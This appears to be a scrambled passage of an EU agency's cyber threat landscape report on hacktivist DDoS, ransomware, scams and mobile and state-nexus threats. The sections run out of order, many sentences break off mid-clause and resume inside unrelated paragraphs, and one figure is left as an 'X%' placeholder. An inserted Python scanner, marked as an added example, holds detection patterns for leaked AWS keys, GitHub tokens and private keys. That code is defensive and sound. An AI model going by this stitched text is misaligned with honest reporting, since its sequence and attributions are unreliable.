Another technique illustrating this trend is the use of a HeartCrypt-packed loader with the malicious driver ABYSSWORKER in a Medusa ransomware chain, revealing how attackers exploit or bring their own signed drivers to disable EDR systems [196]. Of particular concern in this regard is the reported abuse of a legitimate tool called HRSworld [197], likely to be increasingly observed in cybercriminal activities. Fog and Qilin, both relatively recent ransomware strains, relied on aggressive pressure tactics, including countdown timers, victim profiles and downloadable sample files in double extortion, targeting reputational damage or regulatory exposure [198], or, in the case of Qilin, a new ‘call lawyer’ feature, which mimics legal escalation, pressuring victims to act quickly under the illusion of formal consequences [199]. The legal-pressure developments are of particular relevance in the EU, where cyber incident reporting and GDPR obligations are likely to represent an additional incentive for impacted companies to pay the requested ransom. Additional TTPs of interest over the reporting period include resorting to physical components [200]. Observed since at least the mid-2010s in China and globally since 2019 [201], pig-butchering scams [202] are increasingly reported as being leveraged to target citizens in EU MSs. In 2024, pig-butchering scams grew by
Scams in which threat actors spend weeks or months building trust with victims, often through fake online relationships, before defrauding them of their money, often by convincing them to invest in fraudulent cryptocurrency platforms.
5.4 FINANCE
The finance sector accounted for 4.7% of all collected incidents, with hacktivist-led DDoS attacks clearly dominating the threat picture, making up 83.5% of the incidents, followed by cybercrime (14.8%) and state-aligned activity (1.7%). Of note, 11% of the incidents with a significant impact reported under the Network and Information Security (NIS) Directive in 2024 were incidents in the finance sector [131]. Within the finance sector, incidents are primarily concentrated in the banking subsector, which accounts for 21.6% of cases. The insurance subsector follows at around 3.4%, while blockchain-related services represent an exceedingly small share at less than 1%.
Banks are also the subsector most targeted by hacktivist groups (69%), likely in an attempt to create nuisances for the users of online banking services, ultimately contributing to the information operation component of hacktivism. NoName057(16) (71.1%), Keymous+ (13.7%) and Dark Storm Team (15.2%) were recorded as being the most active against the finance sector overall. Peaks of activity were notably observed around electoral processes in EU MSs [132], as well as during tense political and societal contexts at the national level in EU MSs, especially when related to polarising topics.
As they clearly process a significant amount of financial and personal data, financial institutions represent high value targets for cybercriminals. Data breaches pertaining to the finance sector amounted to 64% while ransomware accounted for 36%. The ransomware strains reportedly deployed against EU financial institutions were Akira (20%), Datacarry (12%) and BlackLock (4%).
While the targeting of the finance sector is typically associated with DPRK-nexus intrusion sets, targeting by China-nexus intrusion sets was also observed over the reporting period, with an overall total of two incidents. While the widespread nature and lack of granularity of events associated with Lazarus do not allow for a more detailed analysis pertaining to EU organisations 133, based on Lazarus’ previously reported activities it is highly likely this intrusion set still represents a primary threat to EU financial organisations.
5.5 MANUFACTURING Despite a rather low share overall (2.9%), the manufacturing sector went from seventh to fourth place among NIS2 sectors compared to ETL 2024. While a majority of impacted manufacturing organisations were unidentified (94%), the breakdown of identified subsectors shows a clear focus on defence- and automotive-related entities. As websites of these two subsectors were particularly targeted by hacktivist-led DDoS attacks (45.8% of manufacturing targeting by hacktivist groups), it is highly likely this explains the ranking of the most targeted EU MSs, which are perceived as particularly mature in both their defence and automotive sectors.
As with the targeting of previously documented sectors, hacktivist activities against this sector (39.3%) were primarily grounded in the context of the support of Ukraine by EU MSs and led by NoName057(16) (75.6%). Hacktivist activity targeting the manufacturing sector included DDoS attacks and, in some cases,
NoName057(16) claims particularly pertained to the targeting of Italy, France and Poland, alongside Lithuania and Germany. This illustrates a particular emphasis on EU MSs possibly being perceived as threats to Russia in that country’s ongoing war of aggression against Ukraine. NoName057(16) reportedly focused on entities operating in the public administration with sustained targeting of ministries, parliamentary websites and local municipalities as well as finance, with a focus on banks and payment service providers, and transport, notably air and rail transport websites, with the occasional targeting of telecoms and hosting services. NoName057(16)’s activities were highly driven by geopolitical events, including declarations of support for Ukraine by EU MSs and Union entities, as well as sociopolitical situations at the EU level. These are illustrated by their DDoS attacks against the websites of Europol and the European Parliament in response to EU foreign policy actions in September 2024 396, and the targeting of Belgian electoral infrastructure for seven consecutive days, in retaliation for that EU MS’s commitment to supply military equipment to Ukraine 397 398. Assessed to be a ‘for-hire’ opportunistic group originating from North Africa 399, Keymous+ demonstrated a focus on France and Estonia, with activities in Belgium, Denmark and Germany. Most claims were related to public administration, mostly municipal and regional government portals, followed by finance, notably insurance firms and regional banks, digital infrastructure, including domain registrars and cloud providers, education, and media/entertainment. The pro-Palestine anti-Israel Dark Storm Team primarily targeted Poland and Finland, followed by France, Lithuania and Germany. The group’s campaigns were particularly prevalent against the EU public administration sector, followed by transport, finance and media/entertainment and manufacturing.
The Dark Storm Team focused heavily on Ministries of Defence and Ministries of Foreign Affairs, aviation and airport services, and news outlets. The pro-Palestine anti-Israel Mr Hamza claimed attacks against France, Spain, Germany, Lithuania and Belgium, with attacks focused on public administration, with a notable targeting of the manufacturing sector. The group was seen to increase its activities after Q4 2024, through their participation in the Holy League alliance, which reportedly gathered pro-Russia and pro-Palestine groups 400 401 402 403 404 405. Between February and March 2025, Mr Hamza was particularly involved in coordinated campaigns, including #op_france 406, #op_italia, #opromania, #opbelgium, and #opnato 407 408 409. The pro-Russia Rippersec, while relatively less active, demonstrated a slow but steady increase in activity against EU MSs throughout the reporting period. This group appeared to specifically target the public administration and media/entertainment sectors, followed by transport, with a claimed intent to target operational technology (OT).
THE OVERALL IMPACT OF DDOS ACTIVITIES REMAINED MARGINAL. For each most active hacktivist group, analysis shows that explicitly confirmed disruptions are quite limited, with Keymous+ and Mr Hamza appearing slightly more disruptive with approximately 1.5% of attacks resulting in website slowdowns and/or disruptions. Interestingly, while the most prolific in terms of volume, NoName057(16) activities led to almost no confirmed outages, further corroborating the hypothesis of an information operation aspect to activities carried out by this group.
In the context of the Romanian elections, FIMI activities targeting EU entities focused on accusing them of attempting to manipulate the electoral outcome. Russian state-controlled media outlets and official government channels played a key role in shaping and disseminating the core narratives 385, which were later adapted and amplified through IMS, notably Doppelgänger and Portal Kombat. For instance, the Russian Foreign Intelligence Service published a press release accusing the President of the European Commission of pressuring Romanian authorities to arrest a far-right politician 386, which was reshared by Russian and Belarusian state-controlled media as well as the Portal Kombat infrastructure 387 388. During the Moldovan Presidential elections, and as the vote also included a referendum on EU accession, EU entities were particularly targeted. Russian FIMI activities leveraged themes of interference, portraying the EU as hegemonic and tyrannical.
It particularly exploited topics linked to LGBTIQ+ rights to further these narratives. Various behavioural patterns were leveraged in these incidents, including videos impersonating the President of the European Commission and the Commission’s Vice-President, and manipulated quotes of the EU Ambassador to Moldova 389 390 391 392 393. Besides elections, a wide array of events was exploited to further their narratives and degrade Union entities and public institutions in EU MSs, as illustrated by a video demanding the replacement of the EU ambassador to Niger, who was accused of misuse of funds and destabilisation following an EU announcement of €4.5 million in aid to the flood-ridden Sahel and Lake Chad regions 394. Similarly, Matryoshka leveraged the April 2025 European power outage, blaming it on EU sanctions on Russia and accusing the President of the European Commission of blaming it on Russia 395.
ransom letters mailed to executives by criminals masquerading as the BianLian ransomware group 51, or the preposterous re-emergence of Babuk ransomware 52 53. State-nexus intrusion sets also leveraged or brokered cybercrime tradecraft 54, as illustrated by DPRK-nexus Kimsuky using the Clickfix technique, Andariel linked to the Play ransomware activity, likely as an affiliate or IAB, and Moonstone Sleet reported leveraging the Qilin ransomware 55. Similar cross-over was identified with China-nexus intrusion sets, with NailoLocker operations in June and October 2024 targeting the EU health sector, and Mustang Panda leveraging the RA ransomware, plausibly in the frame of moonlighting activities 56 57. State-nexus intrusion sets were increasingly reported leveraging cybercriminal infrastructure. APT29 and Sandworm were observed using commercial residential proxy networks and sharing hosting with cybercriminals, while Andariel 58 and Sandworm 59 were seen deploying commodity infostealers. Conversely, cybercriminal groups adopted social engineering techniques seen used by state-nexus groups, as observed with FIN6 leveraging job applications and fabricated LinkedIn personas to deliver malware, echoing DPRK’s playbook 60. Finally, hybrid campaigns should also be mentioned in this section, especially with activities aligned with Russian objectives continuing to impact EU MSs beyond cyberspace 61 62. In November 2024, Romania’s Constitutional Court annulled the presidential first-round results after its intelligence agencies presented declassified findings that Russian-linked cyber operations, including coordinated social media campaigns with AI-driven misinformation and alleged cyberattacks, distorted the electoral process in favour of the far-right candidate 63. In March 2025, investigative reporting detailed pro-Russia groups using Telegram to recruit EU-based individuals for sabotage, vandalism, arson and influence operations across NATO countries 64 65 66 67 68 69 70.
4.5 PREDICTABLE USE OF AI Over the reporting period, the continuous use of AI across multiple intrusion sets continued to be observed, both as a tool to facilitate or enhance offensive activities and as a target for exploitation. The large-scale deployment and availability of AI systems objectively generate a new level of scalability in malicious activity on the side of attackers 71. While AI-enabled threat activity previously involved attempts by threat actors to use consumer-grade AI tools to augment existing operations, rather than achieve breakthrough capabilities, the emergence of stand-alone malicious AI systems since the beginning of 2025 is of particular concern. As a predictable trend, Large Language Models (LLMs) are leveraged to craft more convincing phishing emails, with reportedly over 80% of all phishing emails identified between September 2024 and February 2025 using AI to some extent 72. AI is notably used in vishing and online fraud involving impersonation, with the
almost 40% year-on-year, reportedly generating between €9.1 (USD 10.6) billion and €11.4 (USD 13.3) billion, and accounting for over one-third of global cryptocurrency scam revenue 203. Throughout this period, open sources noted the increased use of generative AI and deepfake videos to impersonate trusted contacts, enhancing the social-engineering phase of these scams. In late 2024, over two million accounts linked to pig-butchering activity were taken down, much of it originating from criminal centres in Southeast Asia and, increasingly, in Eastern Europe and Africa 204 205. Between 10 and 17 September 2024, Europol coordinated an international operation dismantling a mobile-phone phishing network that unlocked over 1.2 million stolen devices; elements of the compromised devices and stolen credentials had been repurposed for pig-butchering outreach and cryptocurrency theft 206. Of rising and significant concern is the physical targeting, including kidnapping, of crypto-asset holders and their families 207 208. These events have been linked to data leaks from centralised crypto exchanges, which often contain PII, including, in some cases, home addresses 209. Such physical attacks were publicly reported in multiple EU MSs, with several high-profile cases notably in Belgium 210, France 211 and Spain 212.
6.4.2 Evolution of the ecosystem As previously mentioned, the cybercriminal ecosystem underwent frequent disruptions, stemming from internal competition, alliances and LEA operations 213. The first half of 2025 notably saw several RaaS shutdowns, including BlackBasta in February 214 215 and RansomHub in April 2025 216. The latter was announced to have joined the DragonForce-led coalition alongside RansomBay in the same month 217. Since then, while DragonForce primarily claimed ransomware incidents in the US, 19 organisations in EU MSs were listed on their DLS. Having faced a coordinated LEA operation as well as sanctions against one of their affiliates also linked to Evil Corp in October 2024 218 219, LockBit operations were impacted by the compromise, defacement and leaking of their affiliate management panel, and since May 2025 the group seems to have ceased its activities. Whether the newly documented LockBit4 operator Syrphid is a former LockBit affiliate was not known at the time of reporting 220. Multiple operations aiming at disrupting cybercriminal activities across the full supply chain included operations against the communication means of cybercriminals, as illustrated by the dismantling of the Ghost encrypted communications platform in September 2024 221 222, cybercrime forums such as Cracked,
impacted the Busitalia Veneto app and subscription portal, and ATM Milano 16 17. Other relevant examples include the targeting of Berliner Verkehrsbetriebe (BVG)’s external service provider in May 2025, affecting the data of 180 000 BVG customers 18, and unauthorised access to the data of Spanish energy company Repsol’s customers, resulting from the compromise of one of the company’s providers 19. Adversaries were also seen exploiting the digital supply chain, notably by compromising software, repositories or browser extensions 20. Since 2022, and increasingly observed over the reporting period, DPRK-nexus Lazarus leveraged supply chain compromise, with its most recent activities pertaining to the deployment of malicious Node Package Manager (npm) packages in GitHub repositories, mimicking legitimate libraries to compromise developers’ environments 21 22 23. Of note, repositories remain particularly exposed to secret sprawl stemming from insufficient protection, with detected secrets reportedly increasing by 25% between 2023 and 2024 24. A surge in attacks leveraging malicious browser extensions was observed in late 2024, with a campaign that compromised multiple companies’ Chrome browser extensions; these notably targeted extensions related to Artificial Intelligence and Virtual Private Networks (VPN) 25 26 27 28.
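The two repository exposures described above, lookalike npm packages mimicking legitimate libraries and secrets left in source, can both be caught by simple checks run in CI. The following is an added example, not code from the ENISA report or from any project it cites; the allowlist of approved packages, the three secret patterns and the sample repository contents are constructed for illustration.

```python
"""Two lightweight repository checks: lookalike (typosquatted) npm dependency names
and credentials committed to source. Added example; allowlist and samples are constructed."""
import json
import re
from typing import Dict, List, Tuple

# Constructed allowlist: the legitimate npm libraries a project is approved to use.
KNOWN_PACKAGES = {"express", "lodash", "axios", "react", "chalk", "commander"}

# Constructed rule set covering three well-documented credential formats (real scanners ship many more).
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
}

def edit_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: insertion, deletion, substitution and
    transposition of adjacent characters each cost 1. Transposition is included
    because lookalike names are often two swapped letters (lodahs vs lodash)."""
    la, lb = len(a), len(b)
    d = [[0] * (lb + 1) for _ in range(la + 1)]
    for i in range(la + 1):
        d[i][0] = i
    for j in range(lb + 1):
        d[0][j] = j
    for i in range(1, la + 1):
        for j in range(1, lb + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[la][lb]

def lookalike_dependencies(package_json: str, known=KNOWN_PACKAGES,
                           max_distance: int = 1) -> List[Tuple[str, str, int]]:
    """Return (dependency, mimicked_package, distance) for every dependency that is not
    on the allowlist but sits within max_distance edits of an allowed name. Distance 1
    also matches some genuinely distinct packages, so hits are review items, not blocks."""
    data = json.loads(package_json)
    deps: Dict[str, str] = {}
    for section in ("dependencies", "devDependencies"):
        deps.update(data.get(section, {}))
    findings = []
    for name in deps:
        lowered = name.lower()
        if lowered in known:
            continue
        for legit in sorted(known):
            dist = edit_distance(lowered, legit)
            if dist <= max_distance:
                findings.append((name, legit, dist))
    return findings

def find_secrets(files: Dict[str, str]) -> List[Tuple[str, int, str]]:
    """Scan in-memory file contents line by line; return (path, line_number, rule) hits
    so a reviewer can jump straight to the offending line."""
    findings = []
    for path, content in files.items():
        for lineno, line in enumerate(content.splitlines(), 1):
            for rule, pattern in SECRET_PATTERNS.items():
                if pattern.search(line):
                    findings.append((path, lineno, rule))
    return findings

# Constructed sample repository: two lookalike dependencies and two leaked secrets.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-app",
    "dependencies": {"express": "^4.19.2", "lodahs": "^4.17.21", "axios": "^1.7.2"},
    "devDependencies": {"comander": "^12.0.0"},
})
SAMPLE_FILES = {
    "src/config.js": (
        "module.exports = {\n"
        "  region: 'eu-west-1',\n"
        "  // constructed dummy value in access-key-ID format, not a real credential\n"
        "  accessKeyId: 'AKIAIOSFODNN7EXAMPLE',\n"
        "};\n"
    ),
    "README.md": "# example-app\nRun `npm install` and `npm start`.\n",
    "deploy/id_rsa": (
        "-----BEGIN OPENSSH PRIVATE KEY-----\n"
        "constructed-placeholder-not-a-real-key\n"
        "-----END OPENSSH PRIVATE KEY-----\n"
    ),
}

if __name__ == "__main__":
    for hit in lookalike_dependencies(SAMPLE_PACKAGE_JSON):
        print("lookalike dependency:", hit)
    for hit in find_secrets(SAMPLE_FILES):
        print("possible secret:", hit)
```

In a real pipeline the allowlist would be the organisation's curated package list and the file map would be read from the checkout; both checks are deliberately independent so either can gate a merge on its own.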
4.3 CONTINUOUS TARGETING OF MOBILE DEVICES Q1 2025 saw an increased level of reporting pertaining to the targeting of mobile devices, with Android devices facing a higher level of threat. Q3 2024 reportedly saw an uptick in the exploitation of outdated devices through the deployment of the Rafel RAT, primarily targeting Android devices for financially motivated and cyberespionage purposes, notably in Czechia, France, Germany, Italy and Romania 29, as well as the re-emergence of the Medusa banking trojan, updated with new features and expanding its victimology to France and Italy 30. Medusa was notably observed focusing on On-Device Fraud (ODF) through Account Takeover (ATO). Leveraging the same technique, BingoMod RAT was observed draining bank accounts and wiping devices, a concerning evolution 31. Android spyware for surveillance purposes used by State-aligned intrusion sets was also increasingly documented, with Reaper’s Android spyware KoSpy 32, or the Android spyware BoneSpy and PlainGnome leveraged by Uzbekistan-nexus Sandcat. Of particular interest is a report documenting EagleMsgSpy, a lawful intercept surveillance program targeting Android devices, reportedly developed by Wuhan Chinasoft Token Information Technology Co., Ltd. and used by Chinese Public Security Bureaus since at least 2017 33. In February, multiple cybersecurity vendors published reports pertaining to the targeting of mobile devices by Russia-nexus intrusion sets. Google Threat Intelligence Group (GTIG) reportedly observed Sandworm, UNC5792 and UNC4221 (aka UAC-0185) targeting the WhatsApp, Signal and Telegram accounts of individuals in Ukraine 34. Notably, Sandworm was observed enabling Russian military forces to connect Signal accounts on devices collected on the battlefield to actor-controlled infrastructure for follow-on exploitation.
Sandworm was also observed abusing the ‘linked devices’ feature, by crafting malicious QR codes to link a victim's account to an actor-controlled Signal instance, and operating WAVESIGN. Volexity and Microsoft also reported on the
Consistently targeted over the reporting period and across all EU MSs, public administration was the most targeted sector, specifically governmental websites (51.5%) and municipalities (34%). The most impacted EU MSs overall were Italy, France, Spain, Poland and Germany, and the most active hacktivist groups targeting this sector were NoName057(16), Dark Storm Team, Mr Hamza, Keymous+ and Mysterious Team Bangladesh. As Belgium is an EU MS supporting Ukraine and the host country of several EU and international organisations, the targeting of its public administration remains prevalent, with incidents related to this sector representing a disproportionately high share of Belgium’s overall targeting, often accounting for more than half of all incidents. This iteration also saw an increased targeting of intelligence and security services, with incidents concentrated in a few EU Member States in Eastern and Northern Europe where law enforcement has taken high-profile actions against hacktivist groups. These attacks tend to occur as retaliatory spikes rather than sustained campaigns, reflecting hacktivist attempts to signal against domestic security institutions. Accounting for 6.1% of all recorded hacktivist-led incidents, the transport sector was particularly targeted in Poland, Germany and Italy, with a prevalence of attacks on air and rail transport entities. NoName057(16), Dark Storm Team, Mr Hamza, Keymous+ and RipperSec were reportedly the most active groups in targeting this sector. The same groups were also recorded targeting the finance sector, with a focus on the public-facing portals of banks, particularly in Italy, Spain and France. While less prevalent and quite volatile from one month to the next, the targeting of digital infrastructure by hacktivist groups is of particular concern due to its potential for systemic, cross-border impact.
This sector was targeted by NoName057(16), RipperSec, Dark Storm Team, Keymous+ and Mr Hamza, with the most targeted EU MSs being Germany, the Netherlands and France. Interestingly, the manufacturing sector, especially defence-related and automotive-related entities, was particularly targeted by RipperSec, followed by NoName057(16), Dark Storm Team, Keymous+ and Mr Hamza; these attacks were most prevalent in Germany and Poland. Finally, the French and German media/entertainment sector, specifically news outlets and broadcasters, was particularly targeted over the reporting period, with the most active groups including Mr Hamza, NoName057(16), Dark Storm Team, Keymous+ and RipperSec.
9.4 KEY HACKTIVISM TRENDS 9.4.1 Tactics, Techniques and Procedures (TTPs) In addition to adopting allegedly advanced TTPs for DDoS attacks, hacktivist groups were increasingly reported leveraging ransomware, as well as targeting OT. Multiple open-source reports notably documented the use of carpet bombing 437, the leveraging of routers, and the use of AI to increase the intensity and potential impact of their DDoS attacks. According to a report by Netscout related to the first semester of 2024, bot-infected devices rose by 50%, largely due to the emergence of the Zergeca botnet alongside the evolving DDoSia botnet used by NoName057(16), which employs DNS over HTTPS (DoH) for Command and Control (C2) activities. Leveraging or transitioning to ransomware is particularly prevalent among pro-Russia groups, as illustrated by the launch of their own RaaS by the CyberVolk, Azzasec, Funksec and Lapsus$ groups 438 439 440. KillSecurity, originally a pro-Russia hacktivist group aligned with Anonymous, transitioned into a notable player in the ransomware landscape following the
Nulled and BreachForums 223 224 225, and the seizure of the servers of cryptocurrency exchanges suspected of being used to launder financial flows, notably originating from ransomware operations 226. The 28 October 2024 takedown of RedLine and META infostealers under Operation Magnus resulted in multiple arrests and server seizures across Europe and the US 227 228. These efforts continued with the arrest of four leaders of the 8Base group on 10 February, which significantly reduced Phobos ransomware activity 229. A subsequent phase of Operation Endgame from 19 to 22 May 2025 neutralised seven malware families (Bumblebee, Latrodectus, Qakbot, Hijackloader, DanaBot, Trickbot and Warmcookie) commonly used by Initial Access Brokers (IAB) to breach victim systems and enable the deployment of ransomware 230. Law enforcement also focused on dismantling the services and networks that facilitate other forms of cybercrime.
On 4 June 2024, Portuguese and Spanish authorities arrested 54 suspects in a vishing operation 231. Between 10 and 17 September, Europol coordinated an operation with Ameripol that dismantled a phishing network, which unlocked over 1.2 million stolen mobile phones and resulted in 17 arrests 232. Other notable takedowns included the arrest of a suspect linked to DoppelPaymer ransomware in Moldova on 12 May 233 234 235, and Operation Macefall on 21 May, which seized over 2 300 domains tied to LummaStealer infostealer operations 236. The month also saw authorities take down a group providing crypting and counter-antivirus services on 27 May 237.
9.2 HACKTIVISM GEOGRAPHICAL TARGETING Over the reporting period, hacktivism-related activities in the EU mostly targeted organisations in France, Italy, Poland, Germany and Lithuania. While not all of them were necessarily linked with hacktivism, France was reportedly the second most targeted country in the world by DDoS attacks in 2023 410. Peaks in activity identified in this EU MS were congruent with potentially divisive issues relevant to the political and societal national context, as well as declarations of support for Ukraine 411 412, most notably conducted under the #OPFrance banner 413 414 415 416 417 418. Almost half of hacktivist activities recorded against France were carried out by NoName057(16), followed by Keymous+, Dark Storm Team, Mr Hamza, and RipperSec. While all were seen to be focusing on the public administration sector, Keymous+ appeared to primarily target the finance sector, and NoName057(16) and Keymous+ both claimed attacks against the media/entertainment sector.
It is possible the targeting of France by self-proclaimed pro-Russia and pro-Palestine hacktivist groups stems from the fact that this EU MS is one of the most vocal against Russia’s war of aggression in Ukraine and the Hamas/Israel conflict, and is also a permanent Member of the United Nations Security Council. The top five hacktivist groups targeting Italy included NoName057(16), Dark Storm Team, DXPLOIT, Mr Hamza and Alixsec, notably under the #OPItaly banner, which was increasingly used in Q1 2025. While attacks targeting public administration represented X% of the claimed activities of these groups 419 420 421, NoName057(16), Dark Storm Team and DXPLOIT were observed targeting the transport sector. It may be noted that Italy reportedly faced increased targeting of OT systems by Z-PENTEST-ALLIANCE from Q4 2024 onwards. Poland was, in particular, targeted by NoName057(16), Dark Storm Team, SERVER KILLERS, OverFlame, and Keymous+.
More than half of hacktivist claims pertained to the public administration sector, followed by the finance sector, transport, and energy verticals. Of note, the energy sector in Poland appears to be of particular interest to NoName057(16) and OverFlame, both part of the Z-PENTEST-ALLIANCE, which demonstrated intent and capability to target OT systems. In Germany, most active groups included NoName057(16), Keymous+, Dark Storm Team, Mr Hamza and Mysterious Team Bangladesh. Offensive cyber activities targeting the public administration remained prevalent, with one outlier identified as Mysterious Team Bangladesh seemingly focused on targeting the transport and energy sectors. Of interest also is the sustained targeting of finance and manufacturing entities by NoName057(16).
This section discusses the technical coverage of adversary behaviours across the attack lifecycle, mapped directly to MITRE ATT&CK IDs to provide an actionable foundation for SOC teams, detection engineers and threat hunters seeking to prioritise coverage of common attacker techniques and align their defensive strategies with relevant mitigations. The MITRE ATT&CK framework organises real-world observations into a matrix of tactics and techniques, offering detailed examples, detection guidance and mitigations 482. The structured mapping highlights a strong defence-in-depth posture, with an emphasis on access controls, privilege restrictions, endpoint visibility and proactive detection of stealthy malicious behaviours.
extended command-and-control activity, blending loader-style entry controls with ransomware-style resilience measures.
Strengthening the foundation of operating environments is central for prevention. Measures include Execution Prevention (M1038) and Behaviour Prevention on Endpoint (M1040). Baseline controls such as Operating System Configuration (M1028), Software Configuration (M1054) and Active Directory Configuration (M1015) reduce the attack surface. Additional safeguards include Restrict Registry Permissions (M1024), Restrict File and Directory Permissions (M1022) and Restrict Library Loading (M1044). Validation mechanisms such as Code Signing (M1045) and Disable or Remove Feature or Program (M1042) further reduce exposure by ensuring only trusted components and essential features are present.
Identity and access controls form a critical line of defence. These include User Account Management (M1018), Privileged Account Management (M1026) and User Account Control (M1052), which enforce least-privilege principles. Limit Software Installation (M1033) reduces unauthorised application deployment. To counter credential misuse, Password Policies (M1027) and Multi-Factor Authentication (M1032) strengthen identity assurance, while Account Use Policies (M1035) ensure proper oversight of account activity.
Preventing malicious communication and lateral spread relies on layered network defences. Network Intrusion Prevention (M1031) and Filter Network Traffic (M1037) provide frontline detection and blocking. Network Segmentation (M1030) contains threats within isolated zones, while Restrict Web-Based Content (M1021) reduces exposure to drive-by downloads and malicious sites. To further limit unauthorised communications, Limit Access to Resource Over Network (M1048) enforces strict control over resource availability across the network.
Effective oversight ensures early detection of malicious activity. Audit (M1047) provides system and activity logging, while Application Developer Guidance (M1013) reduces exploitable flaws through secure design. Complementary policies such as Account Use Policies (M1035) and Limit Access to Resource Over Network (M1048) enforce consistent monitoring of identity and network activity to detect anomalies.
Assuming that some attacks may succeed, resilience controls minimise impact and accelerate recovery. Data Backup (M1053) and Remote Data Storage (M1029) ensure continuity of operations. Data Loss Prevention (M1057) and Encrypt Sensitive Information (M1041) protect confidentiality and integrity even under compromise. Preventive measures such as Update Software (M1051) and Antivirus/Antimalware (M1049) reduce exploitable weaknesses, while User Training (M1017) equips staff to recognise and resist social engineering attempts.
leveraging of Signal, as part of a recent spearphishing campaign conducted by CozyLarch UTA0304, UTA0307 and Storm-2372 35. In October 2024, Qualcomm published a vulnerability impacting its Digital Signal Processor (DSP) software 36. The vulnerability has an impact on chipsets widely used by various mobile devices and was reported to have been exploited in the wild 37. In 2025, iVerify published an in-depth technical report revealing that state-linked telecommunications providers continue to exploit vulnerabilities in outdated mobile signalling protocols, specifically SS7 and Diameter 38. These protocols, which underpin global mobile communications, were not designed with encryption or strong authentication, leaving them susceptible to interception, location tracking and session hijacking. iVerify demonstrated that operators with privileged access to international telecom infrastructure, such as China Mobile International and China Telecom Global, can remotely monitor and manipulate mobile communications across borders without needing access to the target’s device. These operations are silent, infrastructure-level and difficult to detect, posing significant risks to diplomats, journalists and political actors.
4.4 THREAT GROUPS CONVERGING Across the period, the lines between hacktivism, cybercrime and state-nexus activity continued to blur. Intrusion sets historically distinguished by the level of advancement of their TTPs, the activities they conducted, or their assessed objectives increasingly shared toolsets and modus operandi. This was notably exemplified by hacktivist-led DDoS waves by pro-Russia groups around electoral events, where increased activity was often observed as typical FIMI-aligned behaviour to associate disruption with aspects of information operations. A prominent facet of this trend is faketivism, where state-aligned intrusion sets leverage hacktivist personas and activities. Notable examples include Cyber Army of Russia Reborn, associated with Russia-nexus Sandworm 39, and the CyberAv3ngers group linked to Iran’s IRGC 40. In parallel, hacktivist tooling and criminal ecosystems increasingly intersect. FunkSec’s emergence in late 2024 brought FunkLocker ransomware, blending political messaging with financial extortion, underscoring how quickly ideology-driven branding can pivot to monetisation 41 42 43. Hacktivists, seeking funding and visibility, embraced ransomware beyond DDoS and defacements. CyberVolk, operating in line with Russian interests, has used and promoted multiple strains (AzzaSec, HexaLocker, Parano, as well as LockBit and Chaos) since May 2024 44 45 46. KillSec, originally a pro-Russia hacktivist brand aligned with Anonymous, debuted its platform in June 2024 47. Another aspect of this trend is the false-flag operation carried out by Turla, taking over Transparent Tribe’s infrastructure 48 49, or cybercriminals masquerading as other cybercriminal groups or spoofing their brand, as notably seen with email extortion campaigns impersonating the CL0P ransomware group 50, physical
ABOUT ENISA The European Union Agency for Cybersecurity, ENISA, is the Union’s agency dedicated to achieving a high common level of cybersecurity across Europe. Established in 2004 and strengthened by the EU Cybersecurity Act, the European Union Agency for Cybersecurity contributes to EU cyber policy, enhances the trustworthiness of ICT products, services and processes with cybersecurity certification schemes, cooperates with Member States and EU bodies, and helps Europe prepare for the cyber challenges of tomorrow. Through knowledge sharing, capacity building and awareness raising, the Agency works together with its key stakeholders to strengthen trust in the connected economy, to boost resilience of the Union’s infrastructure, and, ultimately, to keep Europe’s society and citizens digitally secure. More information about ENISA and its work can be found here: www.enisa.europa.eu.
CONTACT For contacting the authors please use etl@enisa.europa.eu. For media enquiries about this paper, please use press@enisa.europa.eu.
AUTHORS Jamila BOUTEMEUR, Ifigeneia LELLA, Ilias BAKATSIS, Georgios CHATZICHRISTOS, Kevin FOLEY, Jussi LESKINEN, Jakub OTCENASEK, Dominik ZIOLEK, ENISA. EEAS STRATCOM.
CONTRIBUTORS The ENISA Threat Landscape authors would like to express their appreciation to the EEAS STRATCOM and Europol EC3 colleagues, as well as the ENISA Incident and Vulnerability reporting services (IVS) and CIRCL colleagues for their active support to the report.
ACKNOWLEDGEMENTS The ENISA Threat Landscape authors would like to acknowledge the valuable feedback and validation of the members of the National Liaison Officers (NLO) network, of the CSIRTs Network (CNW), and of the ENISA Cyber Partnership Programme, as well as the comments received from our European Union Aviation Safety Agency (EASA) colleagues, I4C+ (Information and Analysis Center for Cities), the Financial Services Information and Analysis Center (FI-ISAC), and the European Rail Operators Information and Analysis Center (Rail-ISAC). We also want to thank our ENISA colleagues, Apostolos MALATRAS, Stefano DE CRESCENZO, Razvan GAVRILA, Erika MAGONARA, Eleni PHILIPPOU, Edgars TAURINS, and Johannes CLOS for their input and overall support.
LEGAL NOTICE This publication represents the views and interpretations of ENISA, unless stated otherwise. It does not endorse a regulatory obligation of ENISA or of ENISA bodies pursuant to the Regulation (EU) No 2019/881. ENISA has the right to alter, update or remove the publication or any of its contents. It is intended for information purposes only and it must be accessible free of charge. All references to it or its use as a whole or partially must contain ENISA as its source.
A more granular analysis of the sectorial targeting by these intrusion sets shows a particular interest in targeting governments and diplomatic entities, aviation and maritime industries, NGOs and human rights advocacy groups and telecommunications. Slowly emerging as an outlier is the targeting of food manufacturing and agricultural research. It is likely these campaigns pertain to strategic data collection and intellectual property theft, mirroring China’s Made in China 2025 (MIC 2025) goals for the acquisition of technology and transport connectivity related to China’s Belt and Road project and logistics strategies in Europe. Civil society targeting likely reflects domestic priorities around narrative control and the monitoring of dissident or diaspora networks. While reportedly increasing in Asia, documented China-nexus cyber threats in the EU were particularly inflated by the compromise of edge devices, notably leveraged as Operational Relay Boxes (ORBs) for follow-on offensive cyber activities, as exemplified by campaigns associated with UNC5221256 257 258 reportedly impacting telecommunication providers, manufacturing, aerospace and public administration in the EU.
